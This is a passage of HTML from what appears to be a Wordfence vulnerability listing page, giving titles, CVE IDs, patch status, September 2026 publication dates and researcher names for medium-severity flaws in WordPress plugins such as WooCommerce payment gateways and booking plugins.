		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e4d539a3-9fb0-4ab0-84c4-31fc68f69825" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65d4350e-54b9-4b53-86c6-1486f7ddc5c1" target="_blank" rel="noopener">Payment Gateway PayPay for WooCommerce 0.5 &#8211; 0.9.3 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82215" target="_blank" rel="noopener noreferrer">							CVE-2026-82215						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-paypay-gateway" target="_blank" rel="noopener">Payment Gateway PayPay for WooCommerce</a> <span class="wfvr-software-slug">[wc-paypay-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65d4350e-54b9-4b53-86c6-1486f7ddc5c1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f51dc2b4-894e-4fd5-b8c7-6f579bc41aa0" target="_blank" rel="noopener">Payment Plugins for PayPal WooCommerce &lt;= 2.0.25 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80340" target="_blank" rel="noopener noreferrer">							CVE-2026-80340						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pymntpl-paypal-woocommerce" target="_blank" rel="noopener">Payment Plugins for PayPal WooCommerce</a> <span class="wfvr-software-slug">[pymntpl-paypal-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f51dc2b4-894e-4fd5-b8c7-6f579bc41aa0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66a2ce68-9584-4d08-bc21-5b77a991f243" target="_blank" rel="noopener">Payment Plugins for Stripe WooCommerce &lt;= 4.0.11 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80339" target="_blank" rel="noopener noreferrer">							CVE-2026-80339						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-stripe-payment" target="_blank" rel="noopener">Payment Plugins for Stripe WooCommerce</a> <span class="wfvr-software-slug">[woo-stripe-payment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m1w34p0n" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ff958e29920c1592e3f93275db2c8014.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ff958e29920c1592e3f93275db2c8014"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m1w34p0n" target="_blank" rel="noopener">m1w34p0n</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66a2ce68-9584-4d08-bc21-5b77a991f243" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02487c67-9073-47ea-bf72-e33cc4184c7c" target="_blank" rel="noopener">Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) &lt;= 2.9.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81785" target="_blank" rel="noopener noreferrer">							CVE-2026-81785						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddyforms" target="_blank" rel="noopener">Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)</a> <span class="wfvr-software-slug">[buddyforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02487c67-9073-47ea-bf72-e33cc4184c7c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d6763a3-6773-41fe-b7fd-f21c34963bd8" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker &lt;= 11.2.5 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62140" target="_blank" rel="noopener noreferrer">							CVE-2026-62140						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</a> <span class="wfvr-software-slug">[quiz-master-next]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kahlon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/07862803660450951341d2b3ae95c50f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="07862803660450951341d2b3ae95c50f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kahlon" target="_blank" rel="noopener">Adam Kahlon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d6763a3-6773-41fe-b7fd-f21c34963bd8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96d1d456-a96f-4566-8d5e-6c8aff74137d" target="_blank" rel="noopener">Really Simple Security &lt;= 9.8.0 &#8211;  Unauthenticated Two-Factor Authentication Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89080" target="_blank" rel="noopener noreferrer">							CVE-2026-89080						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-ssl" target="_blank" rel="noopener">Really Simple Security – Simple and Performant Security (formerly Really Simple SSL)</a> <span class="wfvr-software-slug">[really-simple-ssl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96d1d456-a96f-4566-8d5e-6c8aff74137d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a03641f2-fc2b-41df-ad67-0048308273e0" target="_blank" rel="noopener">Return Refund and Exchange For WooCommerce &lt;= 4.6.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81799" target="_blank" rel="noopener noreferrer">							CVE-2026-81799						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-refund-and-exchange-lite" target="_blank" rel="noopener">Return Refund and Exchange For WooCommerce</a> <span class="wfvr-software-slug">[woo-refund-and-exchange-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener">babyhack</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a03641f2-fc2b-41df-ad67-0048308273e0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22f02c44-7482-4986-a4a2-1354d8a5006a" target="_blank" rel="noopener">Robokassa payment gateway for Woocommerce &lt;= 1.8.9 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78536" target="_blank" rel="noopener noreferrer">							CVE-2026-78536						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/robokassa" target="_blank" rel="noopener">Robokassa payment gateway for Woocommerce</a> <span class="wfvr-software-slug">[robokassa]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22f02c44-7482-4986-a4a2-1354d8a5006a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/32a2515d-d4b5-4d44-beb3-6090efc9448a" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution &lt; 1.2.0 &#8211; Payment Bypass to Unauthenticated Arbitrary Booking Price and Payment Method Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87892" target="_blank" rel="noopener noreferrer">							CVE-2026-87892						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution</a> <span class="wfvr-software-slug">[rox-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/79ed370a05dae7cb22b4e00d79829131.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79ed370a05dae7cb22b4e00d79829131"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener">Morato Antoine</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/32a2515d-d4b5-4d44-beb3-6090efc9448a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/896bb599-0525-478f-9c6b-bb40b630edbd" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution 1.0.9 &#8211; 1.2.2 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87894" target="_blank" rel="noopener noreferrer">							CVE-2026-87894						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">Rox Appointment Booking – Appointment Booking Scheduling Solution</a> <span class="wfvr-software-slug">[rox-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/896bb599-0525-478f-9c6b-bb40b630edbd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5eab79e6-cb47-4fe7-993a-e833bd6689f8" target="_blank" rel="noopener">Royal Addons for Elementor &lt;= 1.7.1066 &#8211; Unauthenticated Sensitive Information Exposure via Unfiltered meta_query LIKE Oracle in &#8216;wpr_keyword&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17585" target="_blank" rel="noopener noreferrer">							CVE-2026-17585						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor</a> <span class="wfvr-software-slug">[royal-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarpeg007" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/36cf834ca67acba525ff5451eb6a00a2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="36cf834ca67acba525ff5451eb6a00a2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tarpeg007" target="_blank" rel="noopener">TarPeg007</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5eab79e6-cb47-4fe7-993a-e833bd6689f8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12c9dc6c-22ed-4f60-a85c-83b660e69544" target="_blank" rel="noopener">Salon Booking System – Appointment Booking for Salons, Barbershops &amp; Spas &lt;= 10.31.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81793" target="_blank" rel="noopener noreferrer">							CVE-2026-81793						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/salon-booking-system" target="_blank" rel="noopener">Salon Booking System – Appointment Booking for Salons, Barbershops &amp; Spas</a> <span class="wfvr-software-slug">[salon-booking-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiago-ventura" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a6b5fa3452b966ebfba668f89b1b6c30.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a6b5fa3452b966ebfba668f89b1b6c30"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiago-ventura" target="_blank" rel="noopener">Tiago Ventura</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/12c9dc6c-22ed-4f60-a85c-83b660e69544" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a2ece36-0be8-4a1e-bd86-3f48f02c13f0" target="_blank" rel="noopener">Shirt Product Designer for WooCommerce  1.0.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81794" target="_blank" rel="noopener noreferrer">							CVE-2026-81794						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-shirt-product-designer" target="_blank" rel="noopener">Shirt Product Designer for WooCommerce</a> <span class="wfvr-software-slug">[woo-shirt-product-designer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/evan-nr" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b18e99e14d7f2de268d5197dd1571353.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b18e99e14d7f2de268d5197dd1571353"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/evan-nr" target="_blank" rel="noopener">Evan NR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a2ece36-0be8-4a1e-bd86-3f48f02c13f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3dcf2f22-4202-4902-9883-eb4479fe1028" target="_blank" rel="noopener">Simple CAPTCHA with Cloudflare Turnstile &lt;= 1.42.1 &#8211; Captcha Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66674" target="_blank" rel="noopener noreferrer">							CVE-2026-66674						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-cloudflare-turnstile" target="_blank" rel="noopener">Simple CAPTCHA with Cloudflare Turnstile</a> <span class="wfvr-software-slug">[simple-cloudflare-turnstile]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
